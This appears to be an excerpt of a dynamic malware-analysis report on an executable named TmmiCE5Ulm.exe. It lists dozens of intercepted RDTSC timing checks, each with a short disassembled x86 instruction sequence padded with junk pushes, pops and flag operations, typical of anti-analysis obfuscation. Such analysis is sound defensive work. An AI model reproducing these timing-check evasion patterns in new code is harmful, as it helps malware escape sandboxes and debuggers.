Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9D5722 second address: 9D573A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A3h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9D5E1D second address: 9D5E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9D5E21 second address: 9D5E25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9D5E25 second address: 9D5E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F05F0F49769h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9D5E46 second address: 9D5E6C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05F0F594B1h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DA68B second address: 9DA6AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DA6AE second address: 9DA6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DA6B2 second address: 9DA6FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F05F0F4975Ch 0x0000000f popad 0x00000010 nop 0x00000011 jnp 00007F05F0F4975Ch 0x00000017 push 00000004h 0x00000019 mov dh, 8Ch 0x0000001b push 60AD4BB4h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jbe 00007F05F0F49756h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DA6FB second address: 9DA700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DA949 second address: 9DA9A8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05F0F49758h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dx, si 0x0000000e mov dx, si 0x00000011 push dword ptr [ebp+122D37A8h] 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F05F0F49758h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 clc 0x00000032 call 00007F05F0F49759h 0x00000037 pushad 0x00000038 ja 00007F05F0F49763h 0x0000003e push eax 0x0000003f push edx 0x00000040 jnl 00007F05F0F49756h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DA9A8 second address: 9DA9AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DA9AC second address: 9DA9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jp 00007F05F0F4975Eh 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DA9BD second address: 9DA9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 ja 00007F05F0F594AFh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jc 00007F05F0F594A0h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DDA76 second address: 9DDA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F05F0F49756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DDA80 second address: 9DDA86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DDA86 second address: 9DDA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DDA8C second address: 9DDA96 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F05F0F5949Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DDA96 second address: 9DDAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DDAA5 second address: 9DDAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DDAA9 second address: 9DDAAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DD629 second address: 9DD62D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DD62D second address: 9DD631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DD631 second address: 9DD64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F5949Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DF65F second address: 9DF67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F05F0F49764h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DF67B second address: 9DF685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F05F0F59496h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9DF685 second address: 9DF696 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F05F0F49756h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F4DAC second address: 8F4DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F4DB2 second address: 8F4DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F4DB7 second address: 8F4DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F4DBD second address: 8F4DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F4DC1 second address: 8F4DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F4DC5 second address: 8F4DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F05F0F49768h 0x00000011 jmp 00007F05F0F4975Fh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51003C8 second address: 51003FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F05F0F594A8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51003FC second address: 5100402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120654 second address: 512068F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F05F0F594A6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F05F0F5949Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 512068F second address: 5120695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120695 second address: 51206D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F05F0F5949Eh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F05F0F594A7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51206D2 second address: 51206D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51206D8 second address: 5120745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007F05F0F5949Ah 0x0000000f pushfd 0x00000010 jmp 00007F05F0F594A2h 0x00000015 add esi, 2D4F9068h 0x0000001b jmp 00007F05F0F5949Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [esp], ecx 0x00000025 jmp 00007F05F0F594A6h 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c jmp 00007F05F0F5949Eh 0x00000031 mov dl, cl 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120745 second address: 5120749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120749 second address: 512074F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 512074F second address: 51207A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, 71h 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F05F0F4975Eh 0x00000014 jmp 00007F05F0F49765h 0x00000019 popfd 0x0000001a mov esi, 678163F7h 0x0000001f popad 0x00000020 popad 0x00000021 lea eax, dword ptr [ebp-04h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F05F0F49764h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51207A2 second address: 51207C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov edi, esi 0x0000000d mov dx, ax 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ebx, esi 0x00000017 mov bx, cx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51207C3 second address: 51207F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F05F0F49760h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51207F3 second address: 51207F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51207F7 second address: 51207FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51207FD second address: 5120844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push dword ptr [ebp+08h] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F05F0F594A7h 0x00000012 sub esi, 2F18D9FEh 0x00000018 jmp 00007F05F0F594A9h 0x0000001d popfd 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120844 second address: 512084B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120873 second address: 5120877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120877 second address: 512087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 512087D second address: 51208C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d jmp 00007F05F0F594A0h 0x00000012 mov esi, eax 0x00000014 jmp 00007F05F0F594A0h 0x00000019 je 00007F05F0F594E7h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51208C6 second address: 51208CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51208CA second address: 51208CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51208F4 second address: 51208FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51208FA second address: 5120922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F05F0F5949Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120922 second address: 5120926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120926 second address: 512092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 512092C second address: 5120958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F05F0F49767h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120958 second address: 512095E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 512095E second address: 5120962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120962 second address: 511000F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c mov ebx, ecx 0x0000000e popad 0x0000000f retn 0004h 0x00000012 nop 0x00000013 cmp eax, 00000000h 0x00000016 setne al 0x00000019 jmp 00007F05F0F59492h 0x0000001b xor ebx, ebx 0x0000001d test al, 01h 0x0000001f jne 00007F05F0F59497h 0x00000021 sub esp, 04h 0x00000024 mov dword ptr [esp], 0000000Dh 0x0000002b call 00007F05F5946A8Bh 0x00000030 mov edi, edi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F05F0F5949Bh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 511000F second address: 5110014 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110014 second address: 5110034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05F0F594A3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110034 second address: 5110084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F05F0F4975Fh 0x00000009 xor al, 0000000Eh 0x0000000c jmp 00007F05F0F49769h 0x00000011 popfd 0x00000012 mov bl, cl 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F05F0F49766h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110084 second address: 5110097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110097 second address: 51100A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51100A8 second address: 51100B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F5949Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51100B8 second address: 5110151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 2Ch 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F05F0F49764h 0x00000015 sbb ah, FFFFFFA8h 0x00000018 jmp 00007F05F0F4975Bh 0x0000001d popfd 0x0000001e mov eax, 5F53919Fh 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F05F0F49760h 0x0000002c sbb al, 00000008h 0x0000002f jmp 00007F05F0F4975Bh 0x00000034 popfd 0x00000035 push ecx 0x00000036 jmp 00007F05F0F4975Fh 0x0000003b pop ecx 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 pushfd 0x00000042 jmp 00007F05F0F49762h 0x00000047 sub ch, FFFFFF98h 0x0000004a jmp 00007F05F0F4975Bh 0x0000004f popfd 0x00000050 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110151 second address: 5110173 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, 6074066Bh 0x0000000b popad 0x0000000c xchg eax, ebx 0x0000000d jmp 00007F05F0F5949Eh 0x00000012 xchg eax, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110173 second address: 5110179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110179 second address: 51101AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F05F0F594A2h 0x00000009 and cl, 00000058h 0x0000000c jmp 00007F05F0F5949Bh 0x00000011 popfd 0x00000012 push esi 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51101AA second address: 51101AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51101AE second address: 51101B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51101FD second address: 5110201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110201 second address: 5110207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110207 second address: 511029C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, 2439C624h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, 00000000h 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F05F0F49766h 0x00000019 sbb ah, FFFFFFD8h 0x0000001c jmp 00007F05F0F4975Bh 0x00000021 popfd 0x00000022 mov ebx, ecx 0x00000024 popad 0x00000025 inc ebx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F05F0F49760h 0x0000002d sub ch, 00000038h 0x00000030 jmp 00007F05F0F4975Bh 0x00000035 popfd 0x00000036 mov dx, si 0x00000039 popad 0x0000003a test al, al 0x0000003c jmp 00007F05F0F49762h 0x00000041 je 00007F05F0F4996Eh 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F05F0F49767h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 511029C second address: 5110302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 pushfd 0x00000011 jmp 00007F05F0F594A9h 0x00000016 add al, 00000046h 0x00000019 jmp 00007F05F0F594A1h 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [ebp-14h], edi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F05F0F5949Dh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110302 second address: 5110308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 511035F second address: 5110363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110363 second address: 5110369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
